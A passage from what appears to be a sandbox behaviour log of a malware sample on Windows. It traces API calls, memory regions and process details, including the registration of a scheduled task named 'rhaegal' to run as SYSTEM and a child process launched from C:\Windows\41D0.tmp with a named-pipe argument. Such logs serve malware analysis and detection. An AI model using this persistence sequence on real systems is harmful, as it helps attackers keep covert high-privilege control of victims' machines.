ppSettings=0xad2ec*=0x1c2858) returned 0x0 [0018.582] lstrlenW (lpString="") returned 0 [0018.582] IUnknown:Release (This=0x1c2858) returned 0x1 [0018.582] GetLocalTime (in: lpSystemTime=0xad1dc | out: lpSystemTime=0xad1dc*(wYear=0x7e1, wMonth=0xa, wDayOfWeek=0x4, wDay=0x1a, wHour=0x2, wMinute=0x10, wSecond=0x2b, wMilliseconds=0x2bb)) [0018.582] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x74ea0000 [0018.582] GetProcAddress (hModule=0x74ea0000, lpProcName="GetUserNameW") returned 0x74eb157a [0018.582] GetUserNameW (in: lpBuffer=0xad1f0, pcbBuffer=0xad1d8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xad1d8) returned 1 [0018.582] ITaskDefinition:get_RegistrationInfo (in: This=0x1c1388, ppRegistrationInfo=0xad1ec | out: ppRegistrationInfo=0xad1ec*=0x1c27a8) returned 0x0 [0018.582] IRegistrationInfo:put_Author (This=0x1c27a8, Author="5p5NrGJn0jS HALPmcxz") returned 0x0 [0018.582] _vsnwprintf (in: _Buffer=0xad1f0, _BufferCount=0x7f, _Format="%d-%02d-%02dT%02d:%02d:%02d", _ArgList=0xad1b0 | out: _Buffer="2017-10-26T02:16:43") returned 19 [0018.583] IRegistrationInfo:put_Date (This=0x1c27a8, Date="2017-10-26T02:16:43") returned 0x0 [0018.583] IUnknown:Release (This=0x1c27a8) returned 0x1 [0018.583] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0018.583] LoadStringW (in: hInstance=0x0, uID=0xc0, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="SYSTEM") returned 0x6 [0018.583] lstrlenW (lpString="SYSTEM") returned 6 [0018.583] GetThreadLocale () returned 0x409 [0018.583] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="SYSTEM", cchCount1=-1, lpString2="SYSTEM", cchCount2=-1) returned 2 [0018.583] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0018.583] LoadStringW (in: hInstance=0x0, uID=0xc0, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="SYSTEM") returned 0x6 [0018.583] lstrlenW (lpString="SYSTEM") returned 6 [0018.583] GetThreadLocale () returned 0x409 [0018.583] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="SYSTEM", cchCount1=-1, lpString2="SYSTEM", cchCount2=-1) returned 2 [0018.583] CreateWellKnownSid (in: WellKnownSidType=0x16, DomainSid=0x0, pSid=0xad2e4, cbSid=0xad2dc | out: pSid=0xad2e4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), cbSid=0xad2dc) returned 1 [0018.583] LoadLibraryExA (lpLibFileName="API-MS-Win-Security-SDDL-L1-1-0.dll", hFile=0x0, dwFlags=0x0) returned 0x74e80000 [0018.583] GetProcAddress (hModule=0x74e80000, lpProcName="ConvertSidToStringSidW") returned 0x74e8a901 [0018.583] ConvertSidToStringSidW () returned 0x1 [0018.583] SysStringLen (param_1="S-1-5-18") returned 0x8 [0018.583] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0018.583] LoadStringW (in: hInstance=0x0, uID=0xc0, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="SYSTEM") returned 0x6 [0018.583] lstrlenW (lpString="SYSTEM") returned 6 [0018.583] GetThreadLocale () returned 0x409 [0018.583] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="S-1-5-18", cchCount1=-1, lpString2="SYSTEM", cchCount2=-1) returned 1 [0018.583] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0018.583] LoadStringW (in: hInstance=0x0, uID=0xbf, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="NT AUTHORITY\\SYSTEM") returned 0x13 [0018.583] lstrlenW (lpString="NT AUTHORITY\\SYSTEM") returned 19 [0018.584] GetThreadLocale () returned 0x409 [0018.584] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="S-1-5-18", cchCount1=-1, lpString2="NT AUTHORITY\\SYSTEM", cchCount2=-1) returned 3 [0018.584] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0018.584] LoadStringW (in: hInstance=0x0, uID=0xc3, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="NT AUTHORITY\\LOCALSERVICE") returned 0x19 [0018.584] lstrlenW (lpString="NT AUTHORITY\\LOCALSERVICE") returned 25 [0018.584] GetThreadLocale () returned 0x409 [0018.584] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="S-1-5-18", cchCount1=-1, lpString2="NT AUTHORITY\\LOCALSERVICE", cchCount2=-1) returned 3 [0018.584] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0018.584] LoadStringW (in: hInstance=0x0, uID=0xc4, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="NT AUTHORITY\\NETWORKSERVICE") returned 0x1b [0018.584] lstrlenW (lpString="NT AUTHORITY\\NETWORKSERVICE") returned 27 [0018.584] GetThreadLocale () returned 0x409 [0018.584] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="S-1-5-18", cchCount1=-1, lpString2="NT AUTHORITY\\NETWORKSERVICE", cchCount2=-1) returned 3 [0018.584] GetThreadLocale () returned 0x409 [0018.584] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="S-1-5-18", cchCount1=-1, lpString2="SYSTEM", cchCount2=-1) returned 1 [0018.584] GetThreadLocale () returned 0x409 [0018.584] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="S-1-5-18", cchCount1=-1, lpString2="NT AUTHORITY\\SYSTEM", cchCount2=-1) returned 3 [0018.584] GetThreadLocale () returned 0x409 [0018.584] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="S-1-5-18", cchCount1=-1, lpString2="NT AUTHORITY\\LOCALSERVICE", cchCount2=-1) returned 3 [0018.584] GetThreadLocale () returned 0x409 [0018.584] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="S-1-5-18", cchCount1=-1, lpString2="NT AUTHORITY\\NETWORKSERVICE", cchCount2=-1) returned 3 [0018.584] GetThreadLocale () returned 0x409 [0018.584] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="S-1-5-18", cchCount1=-1, lpString2="S-1-5-18", cchCount2=-1) returned 2 [0018.585] lstrlenW (lpString="") returned 0 [0018.585] ITaskFolder:RegisterTaskDefinition (in: This=0x1c1348, Path="rhaegal", pDefinition=0x1c1388, flags=2, UserId=0xad2d4*(varType=0x8, wReserved1=0x0, wReserved2=0x4150, wReserved3=0x5352, varVal1="S-1-5-18", varVal2=0x1), password=0xad2e4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), LogonType=5, sddl=0xad2f8*(varType=0x0, wReserved1=0x0, wReserved2=0xcf80, wReserved3=0xa, varVal1=0x0, varVal2=0x0), ppTask=0xad384 | out: ppTask=0xad384*=0x1c2b50) returned 0x0 [0018.811] _memicmp (_Buf1=0x5b4e30, _Buf2=0x451ed8, _Size=0x7) returned 0 [0018.812] LoadStringW (in: hInstance=0x0, uID=0x12e, lpBuffer=0x5b6890, cchBufferMax=256 | out: lpBuffer="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 0x40 [0018.812] lstrlenW (lpString="SUCCESS: The scheduled task \"%s\" has successfully been created.\n") returned 64 [0018.812] _vsnwprintf (in: _Buffer=0xad79c, _BufferCount=0x1fb, _Format="SUCCESS: The scheduled task \"%s\" has successfully been created.\n", _ArgList=0xad308 | out: _Buffer="SUCCESS: The scheduled task \"rhaegal\" has successfully been created.\n") returned 69 [0018.812] _fileno (_File=0x76ae2920) returned 1 [0018.812] _errno () returned 0x1c07d8 [0018.812] _get_osfhandle (_FileHandle=1) returned 0x7 [0018.812] _errno () returned 0x1c07d8 [0018.812] GetFileType (hFile=0x7) returned 0x2 [0018.819] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0018.819] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xad2cc | out: lpMode=0xad2cc) returned 1 [0018.819] __iob_func () returned 0x76ae2900 [0018.819] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0018.819] lstrlenW (lpString="SUCCESS: The scheduled task \"rhaegal\" has successfully been created.\n") returned 69 [0018.819] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xad79c*, nNumberOfCharsToWrite=0x45, lpNumberOfCharsWritten=0xad2f4, lpReserved=0x0 | out: lpBuffer=0xad79c*, lpNumberOfCharsWritten=0xad2f4*=0x45) returned 1 [0018.820] IUnknown:Release (This=0x1c2b50) returned 0x0 [0018.820] IUnknown:Release (This=0x1c1388) returned 0x0 [0018.820] IUnknown:Release (This=0x1c1348) returned 0x0 [0018.820] TaskScheduler:IUnknown:Release (This=0x1c12e0) returned 0x1 [0018.820] lstrlenW (lpString="SYSTEM") returned 6 [0018.820] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="SYSTEM", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0018.820] lstrlenW (lpString="") returned 0 [0018.824] exit (_Code=0) Thread: id = 17 os_tid = 0x9f8 Process: id = "8" image_name = "41d0.tmp" filename = "c:\\windows\\41d0.tmp" page_root = "0x61e4c000" os_pid = "0x9d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x960" cmd_line = "\"C:\\Windows\\41D0.tmp\" \\\\.\\pipe\\{2FDFCF81-BD74-41C3-9115-F628925CC568}" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001076e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 664 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 665 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 666 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 667 start_va = 0x76d90000 end_va = 0x76f38fff entry_point = 0x76d90000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 668 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 669 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 670 start_va = 0x7fff2000 end_va = 0x7fff2fff entry_point = 0x0 region_type = private name = "private_0x000000007fff2000" filename = "" Region: id = 671 start_va = 0x13f340000 end_va = 0x13f352fff entry_point = 0x13f340000 region_type = mapped_file name = "41d0.tmp" filename = "\\Windows\\41D0.tmp" (normalized: "c:\\windows\\41d0.tmp") Region: id = 672 start_va = 0x7feff0b0000 end_va = 0x7feff0b0fff entry_point = 0x7feff0b0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 673 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 674 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 675 start_va = 0x7fffffde000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 676 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 677 start_va = 0x76c70000 end_va = 0x76d8efff entry_point = 0x76c70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 678 start_va = 0x7fefd000000 end_va = 0x7fefd06afff entry_point = 0x7fefd000000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 728 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 729 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 730 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 731 start_va = 0x76b70000 end_va = 0x76c69fff entry_point = 0x76b70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 732 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 733 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 734 start_va = 0x7fefe440000 end_va = 0x7fefe56cfff entry_point = 0x7fefe440000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 735 start_va = 0x7fefe780000 end_va = 0x7fefe85afff entry_point = 0x7fefe780000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 736 start_va = 0x7fefe970000 end_va = 0x7fefea0efff entry_point = 0x7fefe970000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 737 start_va = 0x7fefeaf0000 end_va = 0x7fefeafdfff entry_point = 0x7fefeaf0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 738 start_va = 0x7fefeb00000 end_va = 0x7fefeb66fff entry_point = 0x7fefeb00000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 739 start_va = 0x7fefeb70000 end_va = 0x7fefebe0fff entry_point = 0x7fefeb70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 740 start_va = 0x7fefec10000 end_va = 0x7fefecd8fff entry_point = 0x7fefec10000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 741 start_va = 0x7fefef00000 end_va = 0x7fefef1efff entry_point = 0x7fefef00000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 788 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 789 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 790 start_va = 0x480000 end_va = 0x607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 791 start_va = 0x7fefe860000 end_va = 0x7fefe968fff entry_point = 0x7fefe860000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 792 start_va = 0x7fefeec0000 end_va = 0x7fefeeedfff entry_point = 0x7fefeec0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 805 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 806 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 807 start_va = 0x610000 end_va = 0x790fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 808 start_va = 0x7a0000 end_va = 0x1b9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 809 start_va = 0x1cc0000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001cc0000" filename = "" Region: id = 810 start_va = 0x7fefc700000 end_va = 0x7fefc721fff entry_point = 0x7fefc700000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 811 start_va = 0x7fefc210000 end_va = 0x7fefc25bfff entry_point = 0x7fefc210000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 822 start_va = 0x1cd0000 end_va = 0x1e37fff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Region: id = 837 start_va = 0x1cd0000 end_va = 0x1e37fff entry_point = 0x0 region_type = private name = "private_0x0000000001cd0000" filename = "" Thread: id = 14 os_tid = 0x9d8 [0018.414] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fa10 | out: lpSystemTimeAsFileTime=0x28fa10*(dwLowDateTime=0x440d9b10, dwHighDateTime=0x1d34da4)) [0018.414] GetCurrentProcessId () returned 0x9d4 [0018.414] GetCurrentThreadId () returned 0x9d8 [0018.414] GetTickCount () returned 0x14346 [0018.414] QueryPerformanceCounter (in: lpPerformanceCount=0x28fa18 | out: lpPerformanceCount=0x28fa18*=318636112) returned 1 [0018.414] GetVersion () returned 0x1db10106 [0018.415] GetCurrentThreadId () returned 0x9d8 [0018.415] GetStartupInfoW (in: lpStartupInfo=0x28f970 | out: lpStartupInfo=0x28f970*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\41D0.tmp", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x13f345442, hStdError=0x1cc12f0)) [0018.415] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0018.415] GetFileType (hFile=0x3) returned 0x2 [0018.415] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0018.415] GetFileType (hFile=0x7) returned 0x2 [0018.415] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0018.415] GetFileType (hFile=0xb) returned 0x2 [0018.416] SetHandleCount (uNumber=0x20) returned 0x20 [0018.416] GetCommandLineW () returned="\"C:\\Windows\\41D0.tmp\" \\\\.\\pipe\\{2FDFCF81-BD74-41C3-9115-F628925CC568}" [0018.416] GetEnvironmentStringsW () returned 0x9a730* [0018.417] FreeEnvironmentStringsW (penv=0x9a730) returned 1 [0018.417] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x13f34fbd0, nSize=0x104 | out: lpFilename="C:\\Windows\\41D0.tmp" (normalized: "c:\\windows\\41d0.tmp")) returned 0x13 [0018.418] GetLastError () returned 0x0 [0018.418] SetLastError (dwErrCode=0x0) [0018.418] GetLastError () returned 0x0 [0018.418] SetLastError (dwErrCode=0x0) [0018.418] GetLastError () returned 0x0 [0018.418] SetLastError (dwErrCode=0x0) [0018.418] GetACP () returned 0x4e4 [0018.418] GetLastError () returned 0x0 [0018.418] SetLastError (dwErrCode=0x0) [0018.418] IsValidCodePage (CodePage=0x4e4) returned 1 [0018.418] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x28f8e0 | out: lpCPInfo=0x28f8e0) returned 1 [0018.418] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x28f380 | out: lpCPInfo=0x28f380) returned 1 [0018.419] GetLastError () returned 0x0 [0018.419] SetLastError (dwErrCode=0x0) [0018.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f3a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0018.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f3a0, cbMultiByte=256, lpWideCharStr=0x28f080, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ舊埈䶤") returned 256 [0018.419] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ舊埈䶤", cchSrc=256, lpCharType=0x28f6a0 | out: lpCharType=0x28f6a0) returned 1 [0018.419] GetLastError () returned 0x0 [0018.419] SetLastError (dwErrCode=0x0) [0018.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f3a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0018.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f3a0, cbMultiByte=256, lpWideCharStr=0x28f070, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ") returned 256 [0018.419] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0018.419] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", cchSrc=256, lpDestStr=0x28ee60, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌") returned 256 [0018.419] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ쳌", cchWideChar=256, lpMultiByteStr=0x28f4a0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ", lpUsedDefaultChar=0x0) returned 256 [0018.419] GetLastError () returned 0x0 [0018.419] SetLastError (dwErrCode=0x0) [0018.419] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x28f3a0, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0018.419] 